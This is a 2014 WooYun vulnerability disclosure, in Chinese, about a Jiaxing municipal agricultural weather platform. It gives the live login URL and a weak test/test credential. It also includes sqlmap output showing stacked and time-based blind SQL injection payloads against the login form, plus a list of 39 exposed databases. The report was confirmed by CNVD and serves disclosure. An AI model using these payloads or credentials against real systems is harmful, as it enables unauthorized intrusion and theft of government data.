乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2014-06-09: 细节已通知厂商并且等待厂商处理中 2014-06-14: 厂商已经确认,细节仅向厂商公开 2014-06-24: 细节向核心白帽子及相关领域专家公开 2014-07-04: 细节向普通白帽子公开 2014-07-14: 细节向实习白帽子公开 2014-07-24: 细节向公众公开
嘉兴市某监测预警服务平台弱口令及SQL注入
1.嘉兴市农业气象监测预警服务平台用户登录:http://ny.jxqx.net/login.php2.弱口令:test test
3.登陆处sql注入:
http://ny.jxqx.net/login.php (POST)user=admin&pwd=123&rpwd=on&loginSubmit=%E7%99%BB%E5%BD%95
数据中包括嘉善党建网、嘉兴党建网、嘉兴市农业气象监测预警服务平台等
sqlmap identified the following injection points with a total of 1637 HTTP(s) requests:---Place: POSTParameter: user Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries Payload: user=admin'; WAITFOR DELAY '0:0:5'--&pwd=123&rpwd=on&loginSubmit=%E7%99%BB%E5%BD%95 Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase time-based blind Payload: user=admin' WAITFOR DELAY '0:0:5'--&pwd=123&rpwd=on&loginSubmit=%E7%99%BB%E5%BD%95---web server operating system: FreeBSDweb application technology: Apache 2.2.27back-end DBMS: Microsoft SQL Server 2000sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: POSTParameter: user Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries Payload: user=admin'; WAITFOR DELAY '0:0:5'--&pwd=123&rpwd=on&loginSubmit=%E7%99%BB%E5%BD%95 Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase time-based blind Payload: user=admin' WAITFOR DELAY '0:0:5'--&pwd=123&rpwd=on&loginSubmit=%E7%99%BB%E5%BD%95---web server operating system: FreeBSDweb application technology: Apache 2.2.27back-end DBMS: Microsoft SQL Server 2000available databases [39]:[*] [AME ][*] [A文件][*] [公共气象服务][*] [喁务一体化][*] [嘉兴党建网][*] [嘉兴气象台评分\x05\x05][*] [嘉善党建网][*] [天气流程][*] [文明建设网][*] [气象灾害][*] [生态农气\x03][*] [用户][*] [自动站][*] AWS[*] AWS352[*] AWS_TEST[*] AWS_Wind[*] AWSReal[*] AWSTEST[*] changwang[*] customAqarm[*] DBMANAGE[*] equip[*] fcstmanage[*] hyaws[*] JXSQXTDB[*] master[*] model[*] msdb[*] NorthwindA[*] OfficeBusiness_ck[*] prvprz[*] pubs[*] Telescope[*] tempdb[*] test[*] tmp[*] WeaterDB[*] zdz
危害等级:高
漏洞Rank:12
确认时间:2014-06-14 09:24
CNVD确认并复现所述情况,已经转由CNCERT下发给浙江分中心处置。按多个漏洞点综合评分,rank 12
暂无